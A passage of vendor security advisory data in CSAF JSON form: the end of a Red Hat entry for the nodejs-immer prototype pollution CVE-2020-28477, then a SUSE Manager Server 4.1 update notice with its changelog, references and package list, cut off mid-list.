"8Base-RHV-S-4.4:python3-ansible-runner-0:1.4.6-2.el8ar.noarch",
"8Base-RHV-S-4.4:python3-ovirt-engine-lib-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:rhvm-0:4.4.5.9-0.1.el8ev.noarch"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2020-28477"
},
{
"category": "external",
"summary": "RHBZ#1918162",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=1918162"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2020-28477",
"url": "https://www.cve.org/CVERecord?id=CVE-2020-28477"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2020-28477",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2020-28477"
},
{
"category": "external",
"summary": "https://snyk.io/vuln/SNYK-JS-IMMER-1019369",
"url": "https://snyk.io/vuln/SNYK-JS-IMMER-1019369"
}
],
"release_date": "2021-01-19T00:00:00+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2021-04-14T16:34:39+00:00",
"details": "For details on how to apply this update, which includes the changes described in this advisory, refer to:\n\nhttps://access.redhat.com/articles/2974891",
"product_ids": [
"8Base-RHV-S-4.4:ovirt-web-ui-0:1.6.7-1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-web-ui-0:1.6.7-1.el8ev.src"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2021:1169"
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"8Base-RHV-S-4.4:ansible-runner-0:1.4.6-2.el8ar.noarch",
"8Base-RHV-S-4.4:ansible-runner-0:1.4.6-2.el8ar.src",
"8Base-RHV-S-4.4:ansible-runner-service-0:1.0.7-1.el8ev.noarch",
"8Base-RHV-S-4.4:ansible-runner-service-0:1.0.7-1.el8ev.src",
"8Base-RHV-S-4.4:apache-sshd-0:2.6.0-1.el8ev.noarch",
"8Base-RHV-S-4.4:apache-sshd-0:2.6.0-1.el8ev.src",
"8Base-RHV-S-4.4:apache-sshd-javadoc-0:2.6.0-1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-0:4.4.5.9-0.1.el8ev.src",
"8Base-RHV-S-4.4:ovirt-engine-backend-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-dbscripts-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-dwh-0:4.4.5.5-1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-dwh-0:4.4.5.5-1.el8ev.src",
"8Base-RHV-S-4.4:ovirt-engine-dwh-grafana-integration-setup-0:4.4.5.5-1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-dwh-setup-0:4.4.5.5-1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-health-check-bundler-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-restapi-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-setup-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-setup-base-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-setup-plugin-cinderlib-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-setup-plugin-imageio-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-setup-plugin-ovirt-engine-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-setup-plugin-ovirt-engine-common-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-setup-plugin-vmconsole-proxy-helper-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-setup-plugin-websocket-proxy-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-tools-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-tools-backup-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-vmconsole-proxy-helper-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-webadmin-portal-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-websocket-proxy-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-web-ui-0:1.6.7-1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-web-ui-0:1.6.7-1.el8ev.src",
"8Base-RHV-S-4.4:python3-ansible-runner-0:1.4.6-2.el8ar.noarch",
"8Base-RHV-S-4.4:python3-ovirt-engine-lib-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:rhvm-0:4.4.5.9-0.1.el8ev.noarch"
]
}
],
"threats": [
{
"category": "impact",
"details": "Low"
}
],
"title": "nodejs-immer: prototype pollution may lead to DoS or remote code execution"
}
]
}
suse-su-2021:0906-1
Vulnerability from csaf_suse
Notes
{
"document": {
"aggregate_severity": {
"namespace": "https://www.suse.com/support/security/rating/",
"text": "moderate"
},
"category": "csaf_security_advisory",
"csaf_version": "2.0",
"distribution": {
"text": "Copyright 2024 SUSE LLC. All rights reserved.",
"tlp": {
"label": "WHITE",
"url": "https://www.first.org/tlp/"
}
},
"lang": "en",
"notes": [
{
"category": "summary",
"text": "Security update for SUSE Manager Server 4.1",
"title": "Title of the patch"
},
{
"category": "description",
"text": "This update fixes the following issues:\n\ncobbler:\n\n- Fix string replacement for @@xyz@@\n- Better performing string replacements\n\ngrafana-formula:\n\n- Set `supported` to false for unsupported systems (bsc#1182001)\n- Add SLES 15 SP3 and openSUSE Leap 15.3 to supported versions\n\nmgr-libmod:\n\n- Fix \u0027list_modules\u0027 JSON serialization (bsc#1182492)\n\nmgr-osad:\n\n- Adapt to new SSL implementation of rhnlib (bsc#1181807)\n\nprometheus-exporters-formula:\n\n- Add Ubuntu support for Prometheus exporters\u0027 reverse proxy\n\nprometheus-formula:\n\n- Set server hostname from pillar data (bsc#1180439)\n\npy26-compat-salt:\n\n- Do not crash when unexpected cmd output at listing patches (bsc#1181290)\n\nrhnlib:\n\n- Change SSL implementation to python ssl for better SAN and\n hostname matching support (bsc#1181807)\n\nsmdba:\n\n- Do not remove the database if there is no backup and deal with manifest\n\nspacewalk-backend:\n\n- Open repomd files as binary (bsc#1173893)\n- Fix requesting Release file in debian repos (bsc#1182006)\n- Reposync: Fixed Kickstart functionality.\n- Reposync: Fixed URLGrabber error handling.\n- Reposync: Fix modular data handling for cloned channels (bsc#1177508)\n\nspacewalk-client-tools:\n\n- Adapt to new SSL implementation of rhnlib (bsc#1181807)\n\nspacewalk-config:\n\n- Increase apache ssl logs to include response code and process time\n\nspacewalk-java:\n\n- Homogenizes style in filter buttons, facilitating testability\n- Cleanup sessions via SQL query instead of SQL function (bsc#1180224)\n- Rebuild and improve rendering of error pages 404 and 500 pages (bsc#1181228)\n- Fix user creation with pam auth and no password (bsc#1179579)\n- Fix action chains for saltssh minions (bsc#1182200)\n- FIX: Slow response of \u0027Software \u003e Install\u0027 in Ubuntu minions (bsc#1181165)\n- Do not call page decorator in HEAD requests (bsc#1181228)\n- Add \u0027mgr_origin_server\u0027 to Salt pillar data (bsc#1180439)\n- Ensure new files are synced just after writing them (bsc#1175660)\n- Enable openscap auditing for salt systems in SSM (bsc#1157711)\n- Detect debian products (bsc#1181416)\n- Show packages from channels assigned to the targeted system (bsc#1181423)\n- Add an API endpoint to allow/disallow scheduling irrelevant patches (bsc#1180757)\n- Open raw output in new tab for ScriptRunAction (bsc#1180547)\n- Default to preferred items per page in content lifecycle lists (bsc#1180558)\n- Fix modular data handling for cloned channels (bsc#1177508)\n- Fix: login gets an ISE when SSO is enabled (bsc#1181048)\n\nspacewalk-utils:\n\n- Fix modular data handling for cloned channels (bsc#1177508)\n\nspacewalk-web:\n\n- Replace CRLF in ssh priv key when bootstrapping (bsc#1182685)\n- Upgrade immer to fix CVE-2020-28477\n- Default to preferred items per page in content lifecycle lists (bsc#1180558)\n- Fix sorting in content lifecycle projects and cluster tables (bsc#1180558)\n\nsusemanager:\n\n- Add SLE 15 SP3 bootstrap repository definitions (bsc#1182008)\n- Python3-dbus-python and dependencies not installed by default\n on JeOS SLE15 images, add them to the bootstrap repository list\n of packages for traditional (bsc#1182071)\n\nsusemanager-doc-indexes:\n\n- Updated Command Line Registration with Salt section in the Client\n Configuration Guide for clarity.\n- Adds openSUSE Leap SP migration to the SP migration section of the Client\n Configuration Guide\n- Adds note that bootstrap procedure for selecting a parent\n channel is optional in Client Configuration Guide (bsc#1181635)\n- Adds note about checking for valid UUIDs in fstab\n when backing up (bsc#1181814)\n- Updated command for running configure proxy script when replacing a proxy\n- Fixed bad SUSE Customer Center URL\n\nsusemanager-docs_en:\n\n- Updated Command Line Registration with Salt section in the Client\n Configuration Guide for clarity.\n- Adds openSUSE Leap SP migration to the SP migration section of the Client\n Configuration Guide\n- Adds note that bootstrap procedure for selecting a parent\n channel is optional in Client Configuration Guide (bsc#1181635)\n- Adds note about checking for valid UUIDs in fstab\n when backing up (bsc#1181814)\n- Updated command for running configure proxy script when replacing a proxy\n- Fixed bad SUSE Customer Center URL\n\nsusemanager-schema:\n\n- Drop \u0027pxt_session_cleanup\u0027 function (bsc#1180224)\n- Enable openscap auditing for salt systems in SSM (bsc#1157711)\n\nsusemanager-sls:\n\n- Ubuntu 18 has version of apt which does not correctly support\n auth.conf.d directory. Detect the working version and use this feature\n only when we have a higher version installed\n\nxstream:\n\nUpgrade to 1.4.15\n\n- fixes bsc#1180146, CVE-2020-26258 and bsc#1180145, CVE-2020-26259\n- fixes bsc#1180994, CVE-2020-26217\n\nsubscription-matcher:\n\n- Update the xstream dependency to 1.4.15\n\nHow to apply this update:\n1. Log in as root user to the SUSE Manager server.\n2. Stop the Spacewalk service:\n`spacewalk-service stop`\n3. Apply the patch using either zypper patch or YaST Online Update.\n4. Start the Spacewalk service:\n`spacewalk-service start`\n",
"title": "Description of the patch"
},
{
"category": "details",
"text": "SUSE-2021-906,SUSE-SLE-Module-SUSE-Manager-Proxy-4.1-2021-906,SUSE-SLE-Module-SUSE-Manager-Server-4.1-2021-906",
"title": "Patchnames"
},
{
"category": "legal_disclaimer",
"text": "CSAF 2.0 data is provided by SUSE under the Creative Commons License 4.0 with Attribution (CC-BY-4.0).",
"title": "Terms of use"
}
],
"publisher": {
"category": "vendor",
"contact_details": "https://www.suse.com/support/security/contact/",
"name": "SUSE Product Security Team",
"namespace": "https://www.suse.com/"
},
"references": [
{
"category": "external",
"summary": "SUSE ratings",
"url": "https://www.suse.com/support/security/rating/"
},
{
"category": "self",
"summary": "URL of this CSAF notice",
"url": "https://ftp.suse.com/pub/projects/security/csaf/suse-su-2021_0906-1.json"
},
{
"category": "self",
"summary": "URL for SUSE-SU-2021:0906-1",
"url": "https://www.suse.com/support/update/announcement/2021/suse-su-20210906-1/"
},
{
"category": "self",
"summary": "E-Mail link for SUSE-SU-2021:0906-1",
"url": "https://lists.suse.com/pipermail/sle-security-updates/2021-March/008524.html"
},
{
"category": "self",
"summary": "SUSE Bug 1157711",
"url": "https://bugzilla.suse.com/1157711"
},
{
"category": "self",
"summary": "SUSE Bug 1173893",
"url": "https://bugzilla.suse.com/1173893"
},
{
"category": "self",
"summary": "SUSE Bug 1175660",
"url": "https://bugzilla.suse.com/1175660"
},
{
"category": "self",
"summary": "SUSE Bug 1177508",
"url": "https://bugzilla.suse.com/1177508"
},
{
"category": "self",
"summary": "SUSE Bug 1179579",
"url": "https://bugzilla.suse.com/1179579"
},
{
"category": "self",
"summary": "SUSE Bug 1180145",
"url": "https://bugzilla.suse.com/1180145"
},
{
"category": "self",
"summary": "SUSE Bug 1180146",
"url": "https://bugzilla.suse.com/1180146"
},
{
"category": "self",
"summary": "SUSE Bug 1180224",
"url": "https://bugzilla.suse.com/1180224"
},
{
"category": "self",
"summary": "SUSE Bug 1180439",
"url": "https://bugzilla.suse.com/1180439"
},
{
"category": "self",
"summary": "SUSE Bug 1180547",
"url": "https://bugzilla.suse.com/1180547"
},
{
"category": "self",
"summary": "SUSE Bug 1180558",
"url": "https://bugzilla.suse.com/1180558"
},
{
"category": "self",
"summary": "SUSE Bug 1180757",
"url": "https://bugzilla.suse.com/1180757"
},
{
"category": "self",
"summary": "SUSE Bug 1180994",
"url": "https://bugzilla.suse.com/1180994"
},
{
"category": "self",
"summary": "SUSE Bug 1181048",
"url": "https://bugzilla.suse.com/1181048"
},
{
"category": "self",
"summary": "SUSE Bug 1181165",
"url": "https://bugzilla.suse.com/1181165"
},
{
"category": "self",
"summary": "SUSE Bug 1181228",
"url": "https://bugzilla.suse.com/1181228"
},
{
"category": "self",
"summary": "SUSE Bug 1181290",
"url": "https://bugzilla.suse.com/1181290"
},
{
"category": "self",
"summary": "SUSE Bug 1181416",
"url": "https://bugzilla.suse.com/1181416"
},
{
"category": "self",
"summary": "SUSE Bug 1181423",
"url": "https://bugzilla.suse.com/1181423"
},
{
"category": "self",
"summary": "SUSE Bug 1181635",
"url": "https://bugzilla.suse.com/1181635"
},
{
"category": "self",
"summary": "SUSE Bug 1181807",
"url": "https://bugzilla.suse.com/1181807"
},
{
"category": "self",
"summary": "SUSE Bug 1181814",
"url": "https://bugzilla.suse.com/1181814"
},
{
"category": "self",
"summary": "SUSE Bug 1182001",
"url": "https://bugzilla.suse.com/1182001"
},
{
"category": "self",
"summary": "SUSE Bug 1182006",
"url": "https://bugzilla.suse.com/1182006"
},
{
"category": "self",
"summary": "SUSE Bug 1182008",
"url": "https://bugzilla.suse.com/1182008"
},
{
"category": "self",
"summary": "SUSE Bug 1182071",
"url": "https://bugzilla.suse.com/1182071"
},
{
"category": "self",
"summary": "SUSE Bug 1182200",
"url": "https://bugzilla.suse.com/1182200"
},
{
"category": "self",
"summary": "SUSE Bug 1182492",
"url": "https://bugzilla.suse.com/1182492"
},
{
"category": "self",
"summary": "SUSE Bug 1182685",
"url": "https://bugzilla.suse.com/1182685"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2020-26217 page",
"url": "https://www.suse.com/security/cve/CVE-2020-26217/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2020-26258 page",
"url": "https://www.suse.com/security/cve/CVE-2020-26258/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2020-26259 page",
"url": "https://www.suse.com/security/cve/CVE-2020-26259/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2020-28477 page",
"url": "https://www.suse.com/security/cve/CVE-2020-28477/"
}
],
"title": "Security update for SUSE Manager Server 4.1",
"tracking": {
"current_release_date": "2021-03-19T15:18:39Z",
"generator": {
"date": "2021-03-19T15:18:39Z",
"engine": {
"name": "cve-database.git:bin/generate-csaf.pl",
"version": "1"
}
},
"id": "SUSE-SU-2021:0906-1",
"initial_release_date": "2021-03-19T15:18:39Z",
"revision_history": [
{
"date": "2021-03-19T15:18:39Z",
"number": "1",
"summary": "Current version"
}
],
"status": "final",
"version": "1"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"branches": [
{
"category": "product_version",
"name": "smdba-1.7.8-0.3.6.2.aarch64",
"product": {
"name": "smdba-1.7.8-0.3.6.2.aarch64",
"product_id": "smdba-1.7.8-0.3.6.2.aarch64"
}
},
{
"category": "product_version",
"name": "susemanager-4.1.24-3.20.2.aarch64",
"product": {
"name": "susemanager-4.1.24-3.20.2.aarch64",
"product_id": "susemanager-4.1.24-3.20.2.aarch64"
}
},
{
"category": "product_version",
"name": "susemanager-nodejs-sdk-devel-4.1.10-3.15.2.aarch64",
"product": {
"name": "susemanager-nodejs-sdk-devel-4.1.10-3.15.2.aarch64",
"product_id": "susemanager-nodejs-sdk-devel-4.1.10-3.15.2.aarch64"
}
},
{
"category": "product_version",
"name": "susemanager-tools-4.1.24-3.20.2.aarch64",
"product": {
"name": "susemanager-tools-4.1.24-3.20.2.aarch64",
"product_id": "susemanager-tools-4.1.24-3.20.2.aarch64"
}
}
],
"category": "architecture",
"name": "aarch64"
},
{
"branches": [
{
"category": "product_version",
"name": "cobbler-3.0.0+git20190806.32c4bae0-5.6.4.noarch",
"product": {
"name": "cobbler-3.0.0+git20190806.32c4bae0-5.6.4.noarch",
"product_id": "cobbler-3.0.0+git20190806.32c4bae0-5.6.4.noarch"
}
},
{
"category": "product_version",
"name": "cobbler-tests-3.0.0+git20190806.32c4bae0-5.6.4.noarch",
"product": {
"name": "cobbler-tests-3.0.0+git20190806.32c4bae0-5.6.4.noarch",
"product_id": "cobbler-tests-3.0.0+git20190806.32c4bae0-5.6.4.noarch"
}
},
{
"category": "product_version",
"name": "cobbler-web-3.0.0+git20190806.32c4bae0-5.6.4.noarch",
"product": {
"name": "cobbler-web-3.0.0+git20190806.32c4bae0-5.6.4.noarch",
"product_id": "cobbler-web-3.0.0+git20190806.32c4bae0-5.6.4.noarch"
}
},
{
"category": "product_version",
"name": "grafana-formula-0.4.0-3.6.2.noarch",
"product": {
"name": "grafana-formula-0.4.0-3.6.2.noarch",
"product_id": "grafana-formula-0.4.0-3.6.2.noarch"
}
},
{
"category": "product_version",
"name": "mgr-libmod-4.1.7-3.16.2.noarch",
"product": {
"name": "mgr-libmod-4.1.7-3.16.2.noarch",
"product_id": "mgr-libmod-4.1.7-3.16.2.noarch"
}
},
{
"category": "product_version",
"name": "mgr-osa-dispatcher-4.1.5-2.9.4.noarch",
"product": {
"name": "mgr-osa-dispatcher-4.1.5-2.9.4.noarch",
"product_id": "mgr-osa-dispatcher-4.1.5-2.9.4.noarch"
}
},
{
"category": "product_version",
"name": "mgr-osad-4.1.5-2.9.4.noarch",
"product": {
"name": "mgr-osad-4.1.5-2.9.4.noarch",
"product_id": "mgr-osad-4.1.5-2.9.4.noarch"
}
},
{
"category": "product_version",
"name": "prometheus-exporters-formula-0.9.0-3.19.2.noarch",
"product": {
"name": "prometheus-exporters-formula-0.9.0-3.19.2.noarch",
"product_id": "prometheus-exporters-formula-0.9.0-3.19.2.noarch"
}
},
{
"category": "product_version",
"name": "prometheus-formula-0.3.1-3.6.2.noarch",
"product": {
"name": "prometheus-formula-0.3.1-3.6.2.noarch",
"product_id": "prometheus-formula-0.3.1-3.6.2.noarch"
}
},
{
"category": "product_version",
"name": "py26-compat-salt-2016.11.10-6.11.2.noarch",
"product": {
"name": "py26-compat-salt-2016.11.10-6.11.2.noarch",
"product_id": "py26-compat-salt-2016.11.10-6.11.2.noarch"
}
},
{
"category": "product_version",
"name": "python2-mgr-osa-common-4.1.5-2.9.4.noarch",
"product": {
"name": "python2-mgr-osa-common-4.1.5-2.9.4.noarch",
"product_id": "python2-mgr-osa-common-4.1.5-2.9.4.noarch"
}
},
{
"category": "product_version",
"name": "python2-mgr-osa-dispatcher-4.1.5-2.9.4.noarch",
"product": {
"name": "python2-mgr-osa-dispatcher-4.1.5-2.9.4.noarch",
"product_id": "python2-mgr-osa-dispatcher-4.1.5-2.9.4.noarch"
}
},
{
"category": "product_version",
"name": "python2-mgr-osad-4.1.5-2.9.4.noarch",
"product": {
"name": "python2-mgr-osad-4.1.5-2.9.4.noarch",
"product_id": "python2-mgr-osad-4.1.5-2.9.4.noarch"
}
},
{
"category": "product_version",
"name": "python2-rhnlib-4.1.3-4.3.2.noarch",
"product": {
"name": "python2-rhnlib-4.1.3-4.3.2.noarch",
"product_id": "python2-rhnlib-4.1.3-4.3.2.noarch"
}
},
{
"category": "product_version",
"name": "python2-spacewalk-check-4.1.9-4.12.4.noarch",
"product": {
"name": "python2-spacewalk-check-4.1.9-4.12.4.noarch",
"product_id": "python2-spacewalk-check-4.1.9-4.12.4.noarch"
}
},
{
"category": "product_version",
"name": "python2-spacewalk-client-setup-4.1.9-4.12.4.noarch",
"product": {
"name": "python2-spacewalk-client-setup-4.1.9-4.12.4.noarch",
"product_id": "python2-spacewalk-client-setup-4.1.9-4.12.4.noarch"
}
},
{
"category": "product_version",
"name": "python2-spacewalk-client-tools-4.1.9-4.12.4.noarch",
"product": {
"name": "python2-spacewalk-client-tools-4.1.9-4.12.4.noarch",
"product_id": "python2-spacewalk-client-tools-4.1.9-4.12.4.noarch"
}
},
{
"category": "product_version",
"name": "python3-mgr-osa-common-4.1.5-2.9.4.noarch",
"product": {
"name": "python3-mgr-osa-common-4.1.5-2.9.4.noarch",
"product_id": "python3-mgr-osa-common-4.1.5-2.9.4.noarch"
}
},
{
"category": "product_version",
"name": "python3-mgr-osa-dispatcher-4.1.5-2.9.4.noarch",
"product": {
"name": "python3-mgr-osa-dispatcher-4.1.5-2.9.4.noarch",
"product_id": "python3-mgr-osa-dispatcher-4.1.5-2.9.4.noarch"
}
},
{
"category": "product_version",
"name": "python3-mgr-osad-4.1.5-2.9.4.noarch",
"product": {
"name": "python3-mgr-osad-4.1.5-2.9.4.noarch",
"product_id": "python3-mgr-osad-4.1.5-2.9.4.noarch"
}
},
{
"category": "product_version",
"name": "python3-rhnlib-4.1.3-4.3.2.noarch",
"product": {
"name": "python3-rhnlib-4.1.3-4.3.2.noarch",
"product_id": "python3-rhnlib-4.1.3-4.3.2.noarch"
}
},
{
"category": "product_version",
"name": "python3-spacewalk-check-4.1.9-4.12.4.noarch",
"product": {
"name": "python3-spacewalk-check-4.1.9-4.12.4.noarch",
"product_id": "python3-spacewalk-check-4.1.9-4.12.4.noarch"
}
},
{
"category": "product_version",
"name": "python3-spacewalk-client-setup-4.1.9-4.12.4.noarch",
"product": {
"name": "python3-spacewalk-client-setup-4.1.9-4.12.4.noarch",
"product_id": "python3-spacewalk-client-setup-4.1.9-4.12.4.noarch"
}
},
{
"category": "product_version",
"name": "python3-spacewalk-client-tools-4.1.9-4.12.4.noarch",
"product": {
"name": "python3-spacewalk-client-tools-4.1.9-4.12.4.noarch",
"product_id": "python3-spacewalk-client-tools-4.1.9-4.12.4.noarch"
}
},
{
"category": "product_version",
"name": "spacewalk-backend-4.1.21-4.22.7.noarch",
"product": {
"name": "spacewalk-backend-4.1.21-4.22.7.noarch",
"product_id": "spacewalk-backend-4.1.21-4.22.7.noarch"
}
},
{
"category": "product_version",
"name": "spacewalk-backend-app-4.1.21-4.22.7.noarch",
"product": {
"name": "spacewalk-backend-app-4.1.21-4.22.7.noarch",
"product_id": "spacewalk-backend-app-4.1.21-4.22.7.noarch"
}
},
{
"category": "product_version",
"name": "spacewalk-backend-applet-4.1.21-4.22.7.noarch",
"product": {
"name": "spacewalk-backend-applet-4.1.21-4.22.7.noarch",
"product_id": "spacewalk-backend-applet-4.1.21-4.22.7.noarch"
}
},
{
"category": "product_version",
"name": "spacewalk-backend-cdn-4.1.21-4.22.7.noarch",
"product": {
"name": "spacewalk-backend-cdn-4.1.21-4.22.7.noarch",
"product_id": "spacewalk-backend-cdn-4.1.21-4.22.7.noarch"
}
},
{
"category": "product_version",
"name": "spacewalk-backend-config-files-4.1.21-4.22.7.noarch",
"product": {
"name": "spacewalk-backend-config-files-4.1.21-4.22.7.noarch",
"product_id": "spacewalk-backend-config-files-4.1.21-4.22.7.noarch"
}
},
{
"category": "product_version",
"name": "spacewalk-backend-config-files-common-4.1.21-4.22.7.noarch",
"product": {
"name": "spacewalk-backend-config-files-common-4.1.21-4.22.7.noarch",
"product_id": "spacewalk-backend-config-files-common-4.1.21-4.22.7.noarch"
}
},
{
"category": "product_version",
"name": "spacewalk-backend-config-files-tool-4.1.21-4.22.7.noarch",
"product": {
"name": "spacewalk-backend-config-files-tool-4.1.21-4.22.7.noarch",
"product_id": "spacewalk-backend-config-files-tool-4.1.21-4.22.7.noarch"
}
},
{
"category": "product_version",
"name": "spacewalk-backend-iss-4.1.21-4.22.7.noarch",
"product": {
"name": "spacewalk-backend-iss-4.1.21-4.22.7.noarch",
"product_id": "spacewalk-backend-iss-4.1.21-4.22.7.noarch"
}
},
{
"category": "product_version",
"name": "spacewalk-backend-iss-export-4.1.21-4.22.7.noarch",
"product": {
"name": "spacewalk-backend-iss-export-4.1.21-4.22.7.noarch",
"product_id": "spacewalk-backend-iss-export-4.1.21-4.22.7.noarch"
}
},
{
"category": "product_version",
"name": "spacewalk-backend-package-push-server-4.1.21-4.22.7.noarch",
"product": {
"name": "spacewalk-backend-package-push-server-4.1.21-4.22.7.noarch",
"product_id": "spacewalk-backend-package-push-server-4.1.21-4.22.7.noarch"
}
},
{
"category": "product_version",
"name": "spacewalk-backend-server-4.1.21-4.22.7.noarch",
"product": {
"name": "spacewalk-backend-server-4.1.21-4.22.7.noarch",
"product_id": "spacewalk-backend-server-4.1.21-4.22.7.noarch"
}
},
{
"category": "product_version",
"name": "spacewalk-backend-sql-4.1.21-4.22.7.noarch",
"product": {
"name": "spacewalk-backend-sql-4.1.21-4.22.7.noarch",
"product_id": "spacewalk-backend-sql-4.1.21-4.22.7.noarch"
}
},
{
"category": "product_version",
"name": "spacewalk-backend-sql-postgresql-4.1.21-4.22.7.noarch",
"product": {
"name": "spacewalk-backend-sql-postgresql-4.1.21-4.22.7.noarch",
"product_id": "spacewalk-backend-sql-postgresql-4.1.21-4.22.7.noarch"
}
},
{
"category": "product_version",
"name": "spacewalk-backend-tools-4.1.21-4.22.7.noarch",
"product": {
"name": "spacewalk-backend-tools-4.1.21-4.22.7.noarch",
"product_id": "spacewalk-backend-tools-4.1.21-4.22.7.noarch"
}
},
{
"category": "product_version",
"name": "spacewalk-backend-xml-export-libs-4.1.21-4.22.7.noarch",
"product": {
"name": "spacewalk-backend-xml-export-libs-4.1.21-4.22.7.noarch",
"product_id": "spacewalk-backend-xml-export-libs-4.1.21-4.22.7.noarch"
}
},
{
"category": "product_version",
"name": "spacewalk-backend-xmlrpc-4.1.21-4.22.7.noarch",
"product": {
"name": "spacewalk-backend-xmlrpc-4.1.21-4.22.7.noarch",
"product_id": "spacewalk-backend-xmlrpc-4.1.21-4.22.7.noarch"
}
},
{
"category": "product_version",
"name": "spacewalk-base-4.1.23-3.18.6.noarch",
"product": {
"name": "spacewalk-base-4.1.23-3.18.6.noarch",
"product_id": "spacewalk-base-4.1.23-3.18.6.noarch"
}
},
{
"category": "product_version",
"name": "spacewalk-base-minimal-4.1.23-3.18.6.noarch",
"product": {
"name": "spacewalk-base-minimal-4.1.23-3.18.6.noarch",
"product_id": "spacewalk-base-minimal-4.1.23-3.18.6.noarch"
}
},
{
"category": "product_version",
"name": "spacewalk-base-minimal-config-4.1.23-3.18.6.noarch",
"product": {
"name": "spacewalk-base-minimal-config-4.1.23-3.18.6.noarch",
"product_id": "spacewalk-base-minimal-config-4.1.23-3.18.6.noarch"
}
},
{
"category": "product_version",
"name": "spacewalk-check-4.1.9-4.12.4.noarch",
"product": {
"name": "spacewalk-check-4.1.9-4.12.4.noarch",
"product_id": "spacewalk-check-4.1.9-4.12.4.noarch"
}
},
{
"category": "product_version",
"name": "spacewalk-client-setup-4.1.9-4.12.4.noarch",
"product": {
"name": "spacewalk-client-setup-4.1.9-4.12.4.noarch",
"product_id": "spacewalk-client-setup-4.1.9-4.12.4.noarch"
}
},
{
"category": "product_version",
"name": "spacewalk-client-tools-4.1.9-4.12.4.noarch",
"product": {
"name": "spacewalk-client-tools-4.1.9-4.12.4.noarch",
"product_id": "spacewalk-client-tools-4.1.9-4.12.4.noarch"
}
},
{
"category": "product_version",
"name": "spacewalk-config-4.1.5-3.3.2.noarch",
"product": {
"name": "spacewalk-config-4.1.5-3.3.2.noarch",
"product_id": "spacewalk-config-4.1.5-3.3.2.noarch"
}
},
{
"category": "product_version",
"name": "spacewalk-dobby-4.1.23-3.18.6.noarch",
"product": {
"name": "spacewalk-dobby-4.1.23-3.18.6.noarch",
"product_id": "spacewalk-dobby-4.1.23-3.18.6.noarch"
}
},
{
"category": "product_version",
"name": "spacewalk-html-4.1.23-3.18.6.noarch",
"product": {
"name": "spacewalk-html-4.1.23-3.18.6.noarch",
"product_id": "spacewalk-html-4.1.23-3.18.6.noarch"
}
},
{
"category": "product_version",
"name": "spacewalk-html-debug-4.1.23-3.18.6.noarch",
"product": {
"name": "spacewalk-html-debug-4.1.23-3.18.6.noarch",
"product_id": "spacewalk-html-debug-4.1.23-3.18.6.noarch"
}
},
{
"category": "product_version",
"name": "spacewalk-java-4.1.30-3.31.7.noarch",
"product": {
"name": "spacewalk-java-4.1.30-3.31.7.noarch",
"product_id": "spacewalk-java-4.1.30-3.31.7.noarch"
}
},
{
"category": "product_version",
"name": "spacewalk-java-apidoc-sources-4.1.30-3.31.7.noarch",
"product": {
"name": "spacewalk-java-apidoc-sources-4.1.30-3.31.7.noarch",
"product_id": "spacewalk-java-apidoc-sources-4.1.30-3.31.7.noarch"
}
},
{
"category": "product_version",
"name": "spacewalk-java-config-4.1.30-3.31.7.noarch",
"product": {
"name": "spacewalk-java-config-4.1.30-3.31.7.noarch",
"product_id": "spacewalk-java-config-4.1.30-3.31.7.noarch"
}
},
{
"category": "product_version",
"name": "spacewalk-java-lib-4.1.30-3.31.7.noarch",
"product": {
"name": "spacewalk-java-lib-4.1.30-3.31.7.noarch",
